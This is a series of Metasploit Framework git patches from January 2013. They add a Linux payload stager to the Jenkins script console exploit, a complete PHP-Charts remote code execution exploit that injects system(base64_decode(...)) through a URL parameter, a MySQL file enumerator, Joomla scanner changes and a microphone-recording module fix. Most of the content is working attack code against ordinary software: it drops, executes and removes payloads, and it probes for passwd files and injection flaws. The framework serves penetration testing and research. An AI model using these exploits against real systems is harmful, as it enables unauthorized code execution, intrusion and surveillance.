3c923875a9cc..7909ee8966ef 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb @@ -52,7 +52,7 @@ def read_value(addr) def run unless session.platform == "x64/win64" - print_error("Does not work in x86 see: http://dev.metasploit.com/redmine/issues/7639"); + print_error("Does not work in x86 meterpreter (use x64 instead) see: http://dev.metasploit.com/redmine/issues/7639"); return end From aed71f8446b9771dbf3b54af3170773cdd1f6e10 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 20 Jan 2013 13:42:02 +0100 Subject: [PATCH 071/421] linux stager plus little cleanup --- .../multi/http/jenkins_script_console.rb | 45 +++++++++++++++++-- 1 file changed, 41 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index 1033999726bb..2d4eac4dce22 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStagerVBS + include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, @@ -36,8 +37,9 @@ def initialize(info = {}) ], 'Targets' => [ - ['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win'}], - ['Unix', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}], + ['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win'}], + ['Linux', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }], + ['Unix CMD', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}] ], 'DisclosureDate' => 'Jan 18 2013', 'DefaultTarget' => 0)) @@ -46,7 +48,7 @@ def initialize(info = {}) [ OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]), OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]), - OptString.new('TARGETURI', [ true, 'The path to jenkins', '/jenkins/' ]), + OptString.new('TARGETURI', [ true, 'The path to jenkins', '/jenkins/' ]), ], self.class) end @@ -62,6 +64,13 @@ def check end end + def on_new_session(client) + if not @to_delete.nil? + print_warning("Deleting #{@to_delete} payload file") + execute_command("rm #{@to_delete}") + end + end + def http_send_command(cmd, opts = {}) request_parameters = { 'method' => 'POST', @@ -100,9 +109,35 @@ def java_craft_runtime_exec(cmd) end def execute_command(cmd, opts = {}) + vprint_status("Attempting to execute: #{cmd}") http_send_command("#{cmd}") end + def linux_stager + cmds = "echo LINE | tee FILE" + exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + base64 = Rex::Text.encode_base64(exe) + base64.gsub!(/\=/, "\\u003d") + file = rand_text_alphanumeric(4+rand(4)) + + execute_command("touch /tmp/#{file}.b64") + cmds.gsub!(/FILE/, "/tmp/" + file + ".b64") + base64.each_line do |line| + line.chomp! + cmd = cmds + cmd.gsub!(/LINE/, line) + execute_command(cmds) + end + + execute_command("base64 -d /tmp/#{file}.b64|tee /tmp/#{file}") + execute_command("chmod +x /tmp/#{file}") + execute_command("rm /tmp/#{file}.b64") + + execute_command("/tmp/#{file}") + @to_delete = "/tmp/#{file}" + end + + def exploit @uri = target_uri @uri.path = normalize_uri(@uri.path) @@ -138,10 +173,12 @@ def exploit when 'win' print_status("#{rhost}:#{rport} - Sending VBS stager...") execute_cmdstager({:linemax => 2049}) - when 'unix' print_status("#{rhost}:#{rport} - Sending payload...") http_send_command("#{payload.encoded}") + when 'linux' + print_status("#{rhost}:#{rport} - Sending Linux stager...") + linux_stager end handler From 6ae72e4d6361f8e00ed674709587bd9bd6764539 Mon Sep 17 00:00:00 2001 From: bcoles Date: Sun, 20 Jan 2013 23:51:17 +1030 Subject: [PATCH 072/421] Add PHP-Charts v1.0 PHP Code Execution Exploit --- .../exploits/multi/http/php_charts_exec.rb | 117 ++++++++++++++++++ 1 file changed, 117 insertions(+) create mode 100644 modules/exploits/multi/http/php_charts_exec.rb diff --git a/modules/exploits/multi/http/php_charts_exec.rb b/modules/exploits/multi/http/php_charts_exec.rb new file mode 100644 index 000000000000..14591ae3313d --- /dev/null +++ b/modules/exploits/multi/http/php_charts_exec.rb @@ -0,0 +1,117 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "PHP-Charts v1.0 PHP Code Execution Vulnerability", + 'Description' => %q{ + This module exploits a PHP code execution vulnerability in php-Charts + version 1.0 which could be abused to allow users to execute arbitrary + PHP code under the context of the webserver user. The 'url.php' script + calls eval() with user controlled data from any HTTP GET parameter name. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'AkaStep', # Discovery + 'Brendan Coles ' # msf exploit + ], + 'References' => + [ + ['URL', 'http://www.exploit-db.com/exploits/24201/'], + ], + 'Payload' => + { + 'BadChars' => "\x00\x0a\x0d\x22", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic telnet bash netcat-e perl ruby python', + } + }, + 'DefaultOptions' => + { + 'ExitFunction' => "none" + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true }] + ], + 'Privileged' => false, + 'DisclosureDate' => "Jan 18 2013", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path to the web application', '/php-charts_v1.0/']), + ], self.class) + end + + def check + + base = target_uri.path + base << '/' if base[-1, 1] != '/' + peer = "#{rhost}:#{rport}" + fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4) + code = Rex::Text.uri_encode(Rex::Text.encode_base64("echo #{fingerprint}")) + rand_key_value = rand_text_alphanumeric(rand(10)+6) + + # send check + print_status("#{peer} - Sending check") + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}" + }) + + if res and res.body =~ /#{fingerprint}/ + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + print_error("#{peer} - Connection failed") + end + return Exploit::CheckCode::Unknown + + end + + def exploit + + base = target_uri.path + base << '/' if base[-1, 1] != '/' + @peer = "#{rhost}:#{rport}" + code = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded+"&")) + rand_key_value = rand_text_alphanumeric(rand(10)+6) + + # send payload + print_status("#{@peer} - Sending payload (#{code.length} bytes)") + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}" + }) + if res and res.code == 500 + print_good("#{@peer} - Payload sent successfully") + else + fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed") + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + + end +end From f975a42571954b7291c593db0d28a0abce320292 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 21 Jan 2013 02:10:48 +1030 Subject: [PATCH 073/421] move and update php_charts_exec metadata --- modules/exploits/{multi/http => unix/webapp}/php_charts_exec.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/{multi/http => unix/webapp}/php_charts_exec.rb (100%) diff --git a/modules/exploits/multi/http/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb similarity index 100% rename from modules/exploits/multi/http/php_charts_exec.rb rename to modules/exploits/unix/webapp/php_charts_exec.rb From dc318c5aed5f4c76a01a1d815f8a4dceaa842e36 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 21 Jan 2013 02:12:42 +1030 Subject: [PATCH 074/421] update php_charts_exec metadata --- modules/exploits/unix/webapp/php_charts_exec.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/webapp/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb index 14591ae3313d..59be0c3f89f8 100644 --- a/modules/exploits/unix/webapp/php_charts_exec.rb +++ b/modules/exploits/unix/webapp/php_charts_exec.rb @@ -24,12 +24,13 @@ def initialize(info={}) 'License' => MSF_LICENSE, 'Author' => [ - 'AkaStep', # Discovery + 'AkaStep', # Discovery and PoC 'Brendan Coles ' # msf exploit ], 'References' => [ - ['URL', 'http://www.exploit-db.com/exploits/24201/'], + ['EDB', '24201'], + ['OSVDB', '89334'], ], 'Payload' => { From 9769efbf01c58b2bc9c929e96b9f21d0297d3e89 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 20 Jan 2013 17:38:37 +0100 Subject: [PATCH 075/421] references and date updated --- modules/exploits/unix/webapp/php_charts_exec.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/webapp/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb index 59be0c3f89f8..50159d7bc596 100644 --- a/modules/exploits/unix/webapp/php_charts_exec.rb +++ b/modules/exploits/unix/webapp/php_charts_exec.rb @@ -29,8 +29,9 @@ def initialize(info={}) ], 'References' => [ - ['EDB', '24201'], ['OSVDB', '89334'], + ['BID', '57448'], + ['EDB', '24201'] ], 'Payload' => { @@ -52,7 +53,7 @@ def initialize(info={}) ['Automatic Targeting', { 'auto' => true }] ], 'Privileged' => false, - 'DisclosureDate' => "Jan 18 2013", + 'DisclosureDate' => "Jan 16 2013", 'DefaultTarget' => 0)) register_options( From 967c04e72784b36f9405462032e52377ed03e8bc Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 20 Jan 2013 19:54:24 +0100 Subject: [PATCH 076/421] finally it doesn't use FileDropper atm --- modules/exploits/multi/http/jenkins_script_console.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index 2d4eac4dce22..7d94d5640b87 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -12,7 +12,6 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStagerVBS - include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, From 23d1eb7a802e2b55e28b0bc95082daa8786d35e9 Mon Sep 17 00:00:00 2001 From: Robin Wood Date: Sat, 19 Jan 2013 22:48:00 +0000 Subject: [PATCH 077/421] File/dir brute forcer using MySQL --- lib/msf/core/exploit/mysql.rb | 7 ++ .../scanner/mysql/mysql_file_enum.rb | 95 +++++++++++++++++++ 2 files changed, 102 insertions(+) create mode 100644 modules/auxiliary/scanner/mysql/mysql_file_enum.rb diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb index b86e51e9a955..86ed7e856a06 100644 --- a/lib/msf/core/exploit/mysql.rb +++ b/lib/msf/core/exploit/mysql.rb @@ -87,6 +87,13 @@ def mysql_login_datastore return res end + # This function does not handle any errors, if you use this + # make sure you handle the errors yourself + def mysql_query_no_handle(sql) + res = @mysql_handle.query(sql) + res + end + def mysql_query(sql) begin res = @mysql_handle.query(sql) diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb new file mode 100644 index 000000000000..abdc7229487a --- /dev/null +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -0,0 +1,95 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'yaml' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::MYSQL + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'MYSQL File/Directory Enumerator', + 'Description' => %Q{ + Enumerate files and directories using the MySQL load_file feature, for more information see the URL in the references. + }, + 'Version' => '$Revision $', + 'Author' => [ 'Robin Wood ' ], + 'References' => [ + [ 'URL', 'http://pauldotcom.com/2013/01/mysql-file-system-enumeration.html' ], + [ 'URL', 'http://www.digininja.org/projects/mysql_file_enum.php' ] + ], + 'License' => MSF_LICENSE + ) + + register_options([ + OptString.new('FILE_LIST', [ true, "List of directories to enumerate", '' ]), + OptString.new('DATABASE_NAME', [ true, "Name of database to use", 'test' ]), + OptString.new('TABLE_NAME', [ true, "Name of table to use", Rex::Text.rand_text_alpha(8) ]), + OptString.new('USERNAME', [ true, 'The username to authenticate as', "root" ]) + ]) + + end + + def run_host(ip) + print_status("Checking " + ip) + # Should check this before running at all, this is run on a + # per-host level + if not ::File.exists?(datastore['FILE_LIST']) + print_error "File list does not exist!" + return + end + + if (not mysql_login_datastore) + return + end + + mysql_query("USE " + datastore['DATABASE_NAME']) + res = mysql_query("SELECT * FROM information_schema.TABLES WHERE TABLE_SCHEMA = '" + datastore['DATABASE_NAME'] + "' AND TABLE_NAME = '" + datastore['TABLE_NAME'] + "';") + table_exists = (res.size == 1) + + if !table_exists + print_status("Table doesn't exist so creating it") + mysql_query("CREATE TABLE " + datastore['TABLE_NAME'] + " (brute int);") + end + + file = File.new(datastore['FILE_LIST'], "r") + file.each_line do |line| + check_dir(line.chomp) + end + + if !table_exists + print_status("Cleaning up the temp table") + mysql_query("DROP TABLE " + datastore['TABLE_NAME']) + end + end + + def check_dir dir + begin + res = mysql_query_no_handle("LOAD DATA INFILE '" + dir + "' INTO TABLE brute") + rescue ::RbMysql::TextfileNotReadable + print_good(dir + " is a directory and exists") + rescue ::RbMysql::ServerError + print_warning(dir + " does not exist") + rescue ::RbMysql::Error => e + print_error("MySQL Error: #{e.class} #{e.to_s}") + return + rescue Rex::ConnectionTimeout => e + print_error("Timeout: #{e.message}") + return + else + print_good(dir + " is a file and exists") + end + #puts res.inspect + + return + end + +end From fce58ad96db8d217bc8b92a5d61030a1bb46fe97 Mon Sep 17 00:00:00 2001 From: Robin Wood Date: Sat, 19 Jan 2013 23:41:38 +0000 Subject: [PATCH 078/421] Fixed msftidy stuff --- modules/auxiliary/scanner/mysql/mysql_file_enum.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index abdc7229487a..e12933bab23a 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -20,7 +20,6 @@ def initialize 'Description' => %Q{ Enumerate files and directories using the MySQL load_file feature, for more information see the URL in the references. }, - 'Version' => '$Revision $', 'Author' => [ 'Robin Wood ' ], 'References' => [ [ 'URL', 'http://pauldotcom.com/2013/01/mysql-file-system-enumeration.html' ], From ebb0635e0acee6d2ea768b08e15810a24e27942b Mon Sep 17 00:00:00 2001 From: Robin Wood Date: Sun, 20 Jan 2013 00:02:07 +0000 Subject: [PATCH 079/421] stopped using fixed table name --- modules/auxiliary/scanner/mysql/mysql_file_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index e12933bab23a..20efbd61ac7b 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -72,7 +72,7 @@ def run_host(ip) def check_dir dir begin - res = mysql_query_no_handle("LOAD DATA INFILE '" + dir + "' INTO TABLE brute") + res = mysql_query_no_handle("LOAD DATA INFILE '" + dir + "' INTO TABLE " + datastore['TABLE_NAME']) rescue ::RbMysql::TextfileNotReadable print_good(dir + " is a directory and exists") rescue ::RbMysql::ServerError From 6da4b72d8505449a1e5b78bdcae693cebfdc1057 Mon Sep 17 00:00:00 2001 From: Robin Wood Date: Sun, 20 Jan 2013 00:12:38 +0000 Subject: [PATCH 080/421] added a warning and using optpath --- modules/auxiliary/scanner/mysql/mysql_file_enum.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index 20efbd61ac7b..ce85701e1fdb 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -29,9 +29,9 @@ def initialize ) register_options([ - OptString.new('FILE_LIST', [ true, "List of directories to enumerate", '' ]), + OptPath.new('FILE_LIST', [ true, "List of directories to enumerate", '' ]), OptString.new('DATABASE_NAME', [ true, "Name of database to use", 'test' ]), - OptString.new('TABLE_NAME', [ true, "Name of table to use", Rex::Text.rand_text_alpha(8) ]), + OptString.new('TABLE_NAME', [ true, "Name of table to use - Warning, if the table already exists its contents will be corrupted", Rex::Text.rand_text_alpha(8) ]), OptString.new('USERNAME', [ true, 'The username to authenticate as', "root" ]) ]) From e7604f80b203fd62b1864fbdb78b0602c204554a Mon Sep 17 00:00:00 2001 From: Robin Wood Date: Sun, 20 Jan 2013 00:13:42 +0000 Subject: [PATCH 081/421] added a warning and using optpath --- modules/auxiliary/scanner/mysql/mysql_file_enum.rb | 6 ------ 1 file changed, 6 deletions(-) diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index ce85701e1fdb..d11e528c0a79 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -39,12 +39,6 @@ def initialize def run_host(ip) print_status("Checking " + ip) - # Should check this before running at all, this is run on a - # per-host level - if not ::File.exists?(datastore['FILE_LIST']) - print_error "File list does not exist!" - return - end if (not mysql_login_datastore) return From 4d5a7a3d4dc88c9e1bb119e2dfcc697ae72588bd Mon Sep 17 00:00:00 2001 From: Robin Wood Date: Sun, 20 Jan 2013 21:32:02 +0000 Subject: [PATCH 082/421] Brute force directory and file names with MySQL --- modules/auxiliary/scanner/mysql/mysql_file_enum.rb | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index d11e528c0a79..d7b30b5da6fb 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -44,7 +44,16 @@ def run_host(ip) return end - mysql_query("USE " + datastore['DATABASE_NAME']) + begin + mysql_query_no_handle("USE " + datastore['DATABASE_NAME']) + rescue ::RbMysql::Error => e + print_error("MySQL Error: #{e.class} #{e.to_s}") + return + rescue Rex::ConnectionTimeout => e + print_error("Timeout: #{e.message}") + return + end + res = mysql_query("SELECT * FROM information_schema.TABLES WHERE TABLE_SCHEMA = '" + datastore['DATABASE_NAME'] + "' AND TABLE_NAME = '" + datastore['TABLE_NAME'] + "';") table_exists = (res.size == 1) From 5cfe58e8d508d2889deb808c9e0c9c3f2c4a4a75 Mon Sep 17 00:00:00 2001 From: f8lerror Date: Sun, 20 Jan 2013 22:33:04 -0500 Subject: [PATCH 083/421] General code review and corrections --- .../auxiliary/scanner/http/joomla_vulnscan.rb | 81 ++++++++++--------- 1 file changed, 43 insertions(+), 38 deletions(-) diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index c8cbfbae27f9..37bfc3d17309 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -20,9 +20,8 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Joomla Scanner', - 'Version' => '$Revision: 14774 $', 'Description' => %q{ - This module scans the Joomla install for information and potential vulnerabilites. + This module scans a Joomla install for information and potential vulnerabilites. }, 'Author' => [ 'f8lerror' ], 'License' => MSF_LICENSE @@ -40,7 +39,7 @@ def initialize ], self.class) end - def osfingerprint(response) + def osfingerprint (response) if(response.headers.has_key?('Server') ) if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/) os = "Windows" @@ -51,8 +50,9 @@ def osfingerprint(response) end end return os - end - def fingerprint(response, app) + end + + def fingerprint (response, app) if(response.body =~ /(.+)<\/version\/?>/i) v = $1 @@ -87,7 +87,7 @@ def fingerprint(response, app) return out end - def run_host(ip) + def run_host (ip) tpath = datastore['PATH'] if tpath[-1,1] != '/' tpath += '/' @@ -102,12 +102,12 @@ def run_host(ip) apps.each do |app| break if check_app(tpath,app,ip) end - print_status("Scanning for interesting pages") + print_status("Scanning #{ip} for interesting pages") iapps.each do |iapp| scan_pages(tpath,iapp,ip) end if datastore['ENUMERATE'] - print_status("Scanning for plugins") + print_status("Scanning #{ip} for plugins") bres = send_request_cgi({ 'uri' => tpath, 'method' => 'GET', @@ -118,12 +118,13 @@ def run_host(ip) papp = bapp.chomp plugin_search(tpath,papp,ip,bres) end - end - end - def check_app(tpath, app, ip) + + end + + def check_app (tpath, app, ip) res = send_request_cgi({ - 'uri' => tpath+app, + 'uri' => "#{datastore['PATH']}" << app, 'method' => 'GET', }, 5) return if not res or not res.body or not res.code @@ -159,13 +160,14 @@ def check_app(tpath, app, ip) end end - rescue OpenSSL::SSL::SSLError - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - rescue ::Timeout::Error, ::Errno::EPIPE + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE end - def scan_pages(tpath,iapp, ip) + + def scan_pages (tpath, iapp, ip) res = send_request_cgi({ - 'uri' => tpath+iapp, + 'uri' => "#{datastore['PATH']}" << iapp, 'method' => 'GET', }, 5) return if not res or not res.body or not res.code @@ -201,13 +203,14 @@ def scan_pages(tpath,iapp, ip) print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") end end - rescue OpenSSL::SSL::SSLError - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - rescue ::Timeout::Error, ::Errno::EPIPE + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE end - def plugin_search(tpath,papp, ip, bres) + + def plugin_search (tpath, papp, ip, bres) res = send_request_cgi({ - 'uri' => tpath+papp, + 'uri' => "#{datastore['PATH']}" << papp, 'method' => 'GET', }, 5) return if not res or not res.body or not res.code @@ -217,30 +220,32 @@ def plugin_search(tpath,papp, ip, bres) if (res.code.to_i == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize) print_good("Found Plugin: #{papp} ") if (papp =~/passwd/ and res.body !~/root/) - print_error("\tPasswd not found") + print_error("Passwd not found") elsif(papp =~/passwd/ and res.body =~/root/) - print_good("\tPasswd file found in response") + print_good("Passwd file found in response") elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/) - print_good("\tPossible SQL Injection") + print_good("Possible SQL Injection") elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/) - print_error("\tUnable to identify SQL injection") + print_error("Unable to identify SQL injection") elsif(papp =~/>alert/ and res.body !~/>alert/) - print_error("\tNo XSS") + print_error("No XSS") elsif(papp =~/>alert/ and res.body =~/>alert/) - print_good("\tPossible XSS") + print_good("Possible XSS") elsif(res.body =~/SQL syntax/ ) - print_error("\tPossible SQL Injection") + print_good("Possible SQL Injection") elsif(papp =~/com_/) - blah = papp.split('_') - blah1 = blah[1].gsub('/','') + vars = papp.split('_') + pages = vars[1].gsub('/','') res1 = send_request_cgi({ - 'uri' => tpath+"index.php?option=com_#{blah1}", + 'uri' => "#{datastore['PATH']}"<<"index.php?option=com_#{pages}", 'method' => 'GET', }, 5) if (res1.code.to_i == 200) - print_status("\tFound_page: index.php?option=com_#{blah1}") - end + print_good("Found Page: index.php?option=com_#{pages}") + else + print_error("#{datastore['PATH']}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response") end + end report_note( :host => ip, :port => datastore['RPORT'], @@ -257,12 +262,12 @@ def plugin_search(tpath,papp, ip, bres) print_status("#{ip} requires a SSL client certificate") else print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") - end end + end - rescue OpenSSL::SSL::SSLError - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - rescue ::Timeout::Error, ::Errno::EPIPE + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE end From cfeccaa4f8046643db656256aaae9812cf02078c Mon Sep 17 00:00:00 2001 From: Stephen Haywood Date: Sun, 20 Jan 2013 23:26:53 -0500 Subject: [PATCH 084/421] Noted support for importing XML reports. --- plugins/openvas.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/plugins/openvas.rb b/plugins/openvas.rb index 247a0b7a7d76..34d814055231 100644 --- a/plugins/openvas.rb +++ b/plugins/openvas.rb @@ -530,7 +530,7 @@ def cmd_openvas_report_import(*args) end else print_status("Usage: openvas_report_import ") - print_status("Only the NBE format is supported for importing.") + print_status("Only the NBE and XML formats are supported for importing.") end end From 8b70a94b34a40da4056c65444893ea86a82335ce Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 21 Jan 2013 00:30:43 -0600 Subject: [PATCH 085/421] Updates the progress function Because the previous one was wrong. --- modules/post/multi/manage/record_mic.rb | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/modules/post/multi/manage/record_mic.rb b/modules/post/multi/manage/record_mic.rb index 73519ea006e4..31a1c34e1810 100644 --- a/modules/post/multi/manage/record_mic.rb +++ b/modules/post/multi/manage/record_mic.rb @@ -37,10 +37,16 @@ def rhost end def progress - timeout = (datastore['DURATION'] < 1) ? 1 : (datastore['DURATION']*0.1) - datastore['DURATION'].times do |i| - print_status("Recording: #{(Float(i+1)/datastore['DURATION'] * 100).round}% done...") - select(nil, nil, nil, timeout) + duration = datastore['DURATION'] + m = duration / 10 + m = 1 if m == 0 + + duration.times do |i| + if i % m == 0 + p = ((Float((i == 0) ? 1 : i+1) / duration) * 100).round + print_status("#{rhost} - #{p.to_s}%...") + end + select(nil, nil, nil, 1) end end From f05e3580589444abcb6ce7256518d5c30894019c Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Mon, 21 Jan 2013 00:46:05 -0600 Subject: [PATCH 086/421] replace unless rhosts.include? with rhosts.uniq! seems like this will speed up the process due to far less Array lookups --- lib/msf/ui/console/command_dispatcher/db.rb | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index c5904248291e..853722721370 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -283,8 +283,9 @@ def cmd_hosts(*args) if set_rhosts # only unique addresses addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end + rhosts.uniq! end end return @@ -323,8 +324,9 @@ def cmd_hosts(*args) tbl << columns if set_rhosts addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end + rhosts.uniq! if mode == :delete host.destroy delete_count += 1 @@ -347,6 +349,8 @@ def cmd_hosts(*args) set_rhosts_from_addrs(rhosts) if set_rhosts print_status("Deleted #{delete_count} hosts") if delete_count > 0 } +## +## end def cmd_services_help @@ -508,8 +512,9 @@ def cmd_services(*args) tbl << columns if set_rhosts addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end + rhosts.uniq! if (mode == :delete) service.destroy @@ -828,8 +833,9 @@ def cmd_creds(*args) end if set_rhosts addr = (cred.service.host.scope ? cred.service.host.address + '%' + cred.service.host.scope : cred.service.host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end + rhosts.uniq! creds_returned += 1 end @@ -954,8 +960,9 @@ def cmd_notes(*args) msg << " host=#{note.host.address}" if set_rhosts addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end + rhosts.uniq! end if (note.service) name = (note.service.name ? note.service.name : "#{note.service.port}/#{note.service.proto}") From 